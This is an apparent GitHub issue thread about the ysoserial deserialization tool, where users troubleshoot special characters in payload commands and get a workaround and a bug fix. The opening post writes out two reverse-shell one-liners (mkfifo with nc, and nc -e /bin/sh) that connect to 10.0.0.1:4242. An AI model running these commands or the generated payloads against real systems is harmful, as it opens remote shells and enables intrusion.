The 'command' can't have sepcial characters?

[A1vinSmith]

It's not working

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f

But nc -e /bin/sh 10.0.0.1 4242 is working.

My question is which characters can not be used into the cmd?
;, > and/or |

[A1vinSmith]

Another related question is how to use those raw input file. Like .elf and .war?
I tried to put the file name instead of command. Apparently no joy.

[zeroSteiner]

I'm running into an issue that I think is related to special characters as well. Specifically, while using the CommonsBeanutils1 payload, ysoserial crashes when the command has a " character in it. This is the case with many command payloads that are generated by Metasploit.

java -jar ysoserial-master-138dc36bd2-1.jar CommonsBeanutils1 'python -c "FOO"' | xxd -g 1 
Error while generating or serializing payload
javassist.CannotCompileException: [source error] ) is missing
	at javassist.CtBehavior.insertAfter(CtBehavior.java:877)
	at javassist.CtBehavior.insertAfter(CtBehavior.java:792)
	at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:120)
	at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:102)
	at ysoserial.payloads.CommonsBeanutils1.getObject(CommonsBeanutils1.java:20)
	at ysoserial.GeneratePayload.main(GeneratePayload.java:34)
Caused by: compile error: ) is missing
	at javassist.compiler.Parser.parseArgumentList(Parser.java:1340)
	at javassist.compiler.Parser.parseMethodCall(Parser.java:1180)
	at javassist.compiler.Parser.parsePostfix(Parser.java:1036)
	at javassist.compiler.Parser.parseUnaryExpr(Parser.java:888)
	at javassist.compiler.Parser.parseBinaryExpr(Parser.java:775)
	at javassist.compiler.Parser.parseConditionalExpr(Parser.java:719)
	at javassist.compiler.Parser.parseExpression(Parser.java:699)
	at javassist.compiler.Parser.parseDeclarationOrExpression(Parser.java:591)
	at javassist.compiler.Parser.parseStatement(Parser.java:277)
	at javassist.compiler.Javac.compileStmnt(Javac.java:567)
	at javassist.CtBehavior.insertAfterAdvice(CtBehavior.java:892)
	at javassist.CtBehavior.insertAfter(CtBehavior.java:851)
	... 5 more

[A1vinSmith]

I'm running into an issue that I think is related to special characters as well. Specifically, while using the CommonsBeanutils1 payload, ysoserial crashes when the command has a " character in it. This is the case with many command payloads that are generated by Metasploit.

java -jar ysoserial-master-138dc36bd2-1.jar CommonsBeanutils1 'python -c "FOO"' | xxd -g 1 
Error while generating or serializing payload
javassist.CannotCompileException: [source error] ) is missing
	at javassist.CtBehavior.insertAfter(CtBehavior.java:877)
	at javassist.CtBehavior.insertAfter(CtBehavior.java:792)
	at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:120)
	at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:102)
	at ysoserial.payloads.CommonsBeanutils1.getObject(CommonsBeanutils1.java:20)
	at ysoserial.GeneratePayload.main(GeneratePayload.java:34)
Caused by: compile error: ) is missing
	at javassist.compiler.Parser.parseArgumentList(Parser.java:1340)
	at javassist.compiler.Parser.parseMethodCall(Parser.java:1180)
	at javassist.compiler.Parser.parsePostfix(Parser.java:1036)
	at javassist.compiler.Parser.parseUnaryExpr(Parser.java:888)
	at javassist.compiler.Parser.parseBinaryExpr(Parser.java:775)
	at javassist.compiler.Parser.parseConditionalExpr(Parser.java:719)
	at javassist.compiler.Parser.parseExpression(Parser.java:699)
	at javassist.compiler.Parser.parseDeclarationOrExpression(Parser.java:591)
	at javassist.compiler.Parser.parseStatement(Parser.java:277)
	at javassist.compiler.Javac.compileStmnt(Javac.java:567)
	at javassist.CtBehavior.insertAfterAdvice(CtBehavior.java:892)
	at javassist.CtBehavior.insertAfter(CtBehavior.java:851)
	... 5 more

thank you for linking them @zeroSteiner
I saw this https://github.com/rapid7/metasploit-framework/wiki/Generating-%60ysoserial%60-Java-serialized-objects
Does that mean we still can't do java -jar ysoserial-master-138dc36bd2-1.jar CommonsBeanutils1 'python -c "FOO"' | xxd -g 1
solution for Metasploit's future payload only?

[federicodotta]

Hi @A1vinSmith ,

many ysoserial gadgets use Runtime.exec(String) method that works with any target (windows, linux, etc.) but does not work with many special chars.

One solution can be to try to convert your command using this workaround:
http://www.jackson-t.ca/runtime-exec-payloads.html

Alternatively, I forked the repository and added a variation of the payloads that allow all the chars when exploiting Linux or Windows targets, but you have to choose between Windows and Linux when you generate the payload. You can find the build here: https://github.com/federicodotta/ysoserial

You can generate payloads for Windows/Linux as follows:
java -jar ysoserial-fd-0.0.6.jar CommonsCollections1 "echo AAA > a.txt" exec_win
java -jar ysoserial-fd-0.0.6.jar CommonsCollections1 "echo AAA > a.txt" exec_unix

Federico

[A1vinSmith]

Thank you @federicodotta
why not create a pr(maybe with another branch if they're concerned about the api changes) for ysoserial?

[federicodotta]

Hi @A1vinSmith,

Because unfortunately my changes don't apply to all the gadgets, but only to a subset of them. In some gadget it is not possible to add the other modes (sleep, dns, exec_win, exec_unix, etc.) and for this reason I chose to make a "quick and dirty" mod to a fork of the tool.

Federico

[frohoff]

The specific bug causing the problem reported by @zeroSteiner has been resolved in #151.